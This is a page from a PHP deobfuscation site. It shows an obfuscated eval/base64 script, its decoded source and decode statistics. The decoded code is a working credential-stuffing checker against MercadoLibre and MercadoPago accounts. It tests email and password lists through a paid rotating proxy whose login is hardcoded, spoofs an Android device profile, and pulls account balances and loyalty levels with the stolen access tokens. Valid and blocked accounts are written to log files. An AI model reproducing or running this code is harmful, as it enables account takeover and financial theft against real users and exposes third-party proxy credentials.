Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('5U3dZdu4Fb62nwLLKlB2I0QSJSv+id3aX..
Decoded Output download
error_reporting(0);
set_time_limit(0);
function getStr($string, $start, $end) {
$str = explode($start, $string);
$str = explode($end, $str[1]);
return $str[0];
}
$lista = $_GET['lista'];
$separa = explode("|", $lista);
$email = trim($separa[0]);
$senha = trim($separa[1]);
//$proxy = $_GET['proxy'];
//$separa2 = explode("|", $proxy);
//$proxyline1 = trim($separa2[0]);
//$proxyline2 = trim($separa2[1]);
//if(strpos($proxy, 'Checked at http://dichvusocks.us')){
//$proxy = ''.$proxyline2.'';
//}else {
//$proxy = ''.$proxyline1.'';
//}
function letras($length = 16) {
$characters = 'd68059d654c8589b';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString;
}
$fuuid = letras();
$username = 'lum-customer-hl_61ed26e8-zone-static';
$password = 'Sasukedev';
$port = 22225;
$session = mt_rand();
$super_proxy = 'zproxy.lum-superproxy.io';
$ch = curl_init();
curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
curl_setopt($ch, CURLOPT_URL, 'https://api.mercadolibre.com/mobile_authentications');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, arraY('Host: mobile.mercadolibre.com.ar','Connection: Keep-Alive','X-Dejavu-Desired-Response: null','X-Client-Info: null','Timezone: -Infinity','Content-Type: application/json; charset=utf-8','User-Agent: null'));
curl_setopt($ch, CURLOPT_POSTFIELDS, '{
"authentication_request": {
"client_id": "1311377052931992",
"mobile_device_profile_session": {
"disk_space": 32424,
"free_disk_space": 29767,
"model": "GALAXY S6 edge",
"os": "android",
"ram": 1030652,
"resolution": "720x1280",
"system_version": "4.4.2",
"vendor_ids": [
{
"name": "android_id",
"value": "16e0446916adbc41"
},
{
"name": "serial",
"value": "134699cc"
},
{
"name": "fsuuid",
"value": "'.$fuuid.'"
}
],
"vendor_specific_attributes": {
"brand": "samsung",
"device": "crater3gctc",
"feature_accelerometer": true,
"feature_bluetooth": true,
"feature_camera": true,
"feature_compass": true,
"feature_flash": true,
"feature_front_camera": true,
"feature_gps": true,
"feature_gyroscope": true,
"feature_microphone": true,
"feature_nfc": true,
"feature_telephony": true,
"feature_touch_screen": true,
"manufacturer": "samsung",
"platform": "x86",
"product": "crater3gctc",
"screen_density": 1.5
}
},
"user_credentials": {
"name": "'.$email.'",
"password": "'.$senha.'"
}
}
}');
$d2 = curl_exec($ch);
"$d2";
if(strpos($d2, 'ATTEMPTS_EXCEEDE')){
echo "<font style='color: blue'>Socks lixo by</font> <font style='color: gold'>@SH40L1N</font> <span class='label label-roxo'><font style='color: white'></font></span> ".$email." <font style='color: white'>|</font> ".$senha." <font style='color: white'>|</font> Proxy: <span class='label label-roxo'><font style='color: white'>".$proxy."</font></span> <font style='color: white'>|</font> <font style='color: blue'>Retorno:</font> <span class='label label-roxo'><font style='color: white'>tentatvas excedidas</font></span>";
$hnd = fopen("css/emailsProxylixo.txt", "a");
fwrite($hnd, "$email | $senha
");
return;
}
if (strpos($d2, 'authenticated_user') !== false) {
$decoda = json_decode($d2, true);
if (strpos($d2, 'nickname') !== false) {
$nick = $decoda['authenticated_user']['nickname'];
$nick = ' | Nick: <span class="label label-laranja">'.$nick.'</span>';
} else {
$nick = "";
}
if (strpos($d2, 'riskBasedAuthentication') !== false) {
$link = $decoda['authentication_transaction']['validation_url'];
curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
curl_setopt($ch, CURLOPT_URL, $link);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Upgrade-Insecure-Requests: 1',
'Host: accountrecovery.mercadolivre.com.br',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Connection: keep-alive',
'',
));
$acessaVerif = curl_exec($ch);
if (strpos($acessaVerif, 'Acesse por um dispositivo que voc usa habitualmente') !== false) {
$tipo = ' | Tipo: <span class="label label-laranja">Celular</span>';
} elseif (strpos($acessaVerif, 'que enviamos para o seu e-mail ') !== false) {
$tipo = ' | Tipo: <span class="label label-laranja">Email</span>';
} elseif (strpos($acessaVerif, 'responda a sua pergunta secreta') !== false) {
$tipo = ' | Tipo: <span class="label label-laranja">Pergunta</span>';
} elseif (strpos($acessaVerif, 'bloqueamos o acesso sua conta') !== false) {
$tipo = ' | Tipo: <span class="label label-laranja">Bloqueada</span>';
}
$verificacao = '<span class="label label-vermelho">Sim</span> - '.$tipo.'';
} else {
$verificacao = '<span class="label label-verde">No</span>';
$uId = $decoda['authenticated_user']['id'];
$ac_token = $decoda['access_token'];
curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
curl_setopt($ch, CURLOPT_URL, 'https://api.mercadolibre.com/users/' . $uId . '/mercadopago_account/balance?access_token=' . $ac_token);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET");
$d3 = curl_exec($ch);
curl_setopt($ch, CURLOPT_URL, 'https://frontend.mercadolibre.com/loyal/users/' . $uId . '?access_token=' . $ac_token);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'X-Meli-Session-Id: null',
'X-Dejavu-Desired-Response: null',
'X-Client-Info: null',
'User-Agent: MercadoLibre-Android%2F8.9.2%20(GT-I9200%3B%20Android%204.4.2%3B%20Build%2FJDQ39)',
'Accept-Language: pt-BR',
));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET");
$d4 = curl_exec($ch);
$getLeveu = json_decode($d4, true);
$nivelLevel = $getLeveu['level']['number'];
if (!empty($nivelLevel)) {
$nomeLevel = $getLeveu['level']['name'];
$corLevel = $getLeveu['level']['primary_color'];
$nivel = ' | Nivel: <span class="label label-roxo" style="background-color: '.$corLevel.';">'.$nomeLevel.' ('.$nivelLevel.')</span>';
} else {
$nivel = ' | Nivel: <span class="label label-roxo" style="background-color: #20C261;">Iniciante (1)</span>';
}
$decodaSaldo = json_decode($d3, true);
$saldo1 = $decodaSaldo['available_balance'];
$saldo2 = $decodaSaldo['unavailable_balance'];
$saldo = $saldo1 + $saldo2;
if ($saldo <> 0) {
$reais = $saldoResposta = ' | Disponivel: <span class="label label-verde">R$ '.$saldo1.'</span> | Pendente: <span class="label label-verde">R$ '.$saldo2.'</span>';
}
}if ($nivelLevel > 3 ){
$hnd = fopen("css/contaslevel4+.txt", "a");
fwrite($hnd, "$proxy |live |$email|$senha|$nick|$verificacao|$saldoResposta|$reais|NIvel:$nivel
");
}else {
echo "<font style='color: lime'>Live by</font> <font style='color: gold'>@SH40L1N</font> <span class='label label-verde'><font style='color: white'></font></span> ".$email." <font style='color: white'>|</font> ".$senha." " . $nick . " <font style='color: white'>|</font> Verificao de segurana: " . $verificacao . $saldoResposta . $nivel." <font style='color: white'>|</font> <font style='color: lime'>Proxy:</font> <span class='label label-verde'><font style='color: white'>".$proxy."</font></span> <font style='color: white'>|</font> <font style='color: lime;'>Retorno:</font> <span class='label label-verde'><font style='color: white'>Sucesso </font></span>";
$hnd = fopen("css/Liveaprovadas.txt", "a");
fwrite($hnd, "$proxy |live | $email | $senha | $nick |$verificacao | $saldoResposta | $nivel
");
}
}elseif(strpos($d2, 'USER_NOT_FOUND')){
echo "<font style='color: red'>Die By</font> <font style='color: gold'>@SH40L1N</font> <span class='label label-vermelho'><font style='color: white'></font></span> <span class='label label-vermelho'><font style='color: white'>".$email."</font></span> <font style='color: white'>|</font> ".$senha." <font style='color: white'>|</font> <font style='color: red'>Proxy:</font> <span class='label label-vermelho'><font style='color: white'>".$proxy."</font></span> <font style='color: white'>|</font> <font style='color: red'>Retorno:</font> <span class='label label-vermelho'><font style='color: white'>Email no cadastrado </font></span>";
$hnd = fopen("lista_proxy.txt", "a");
fwrite($hnd, "$proxy
");
$hnd2 = fopen("css/emailsnegados.txt", "a");
fwrite($hnd2, "$email|$senha
");
}elseif(strpos($d2, 'INVALID_PWD')){
echo "<font style='color: red'>Die By</font> <font style='color: gold'>@SH40L1N</font> <span class='label label-vermelho'><font style='color: white'></font></span> ".$email." <font style='color: white'>|</font> <span class='label label-vermelho'><font style='color: white'>".$senha."</font></span> <font style='color: white'>|</font> <font style='color: red'>Proxy:</font> <span class='label label-vermelho'><font style='color: white'>".$proxy."</font></span> <font style='color: white'>|</font> <font style='color: red'>Retorno:</font> <span class='label label-vermelho'><font style='color: white'>Senha invalida </font></span>";
$hnd = fopen("lista_proxy.txt", "a");
fwrite($hnd, "$proxy
");
$hnd12 = fopen("css/emailsnegados.txt", "a");
fwrite($hnd12, "$email|$senha
");
}else {
echo "<font style='color: blue'>Socks lixo by</font> <font style='color: gold'>@SH40L1N</font> <span class='label label-roxo'><font style='color: white'></font></span> ".$email." <font style='color: white'>|</font> ".$senha." <font style='color: white'>|</font> <font style='color: blue'>Proxy:</font> <span class='label label-roxo'><font style='color: white'>".$proxy."</font></span> <font style='color: white'>|</font> <font style='color: blue'>Retorno:</font> <span class='label label-roxo'><font style='color: white'>Socks Queimado.</font></span>";
$hnd = fopen("css/emailsProxylixo2.txt", "a");
fwrite($hnd, "$email | $senha
");
}
flush();
ob_flush();
Did this file decode correctly?
Original Code
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?>
Function Calls
gzinflate | 1 |
str_rot13 | 2 |
base64_decode | 1 |
Stats
MD5 | 35aaff04af38078c8f9f69835213c113 |
Eval Count | 1 |
Decode Time | 101 ms |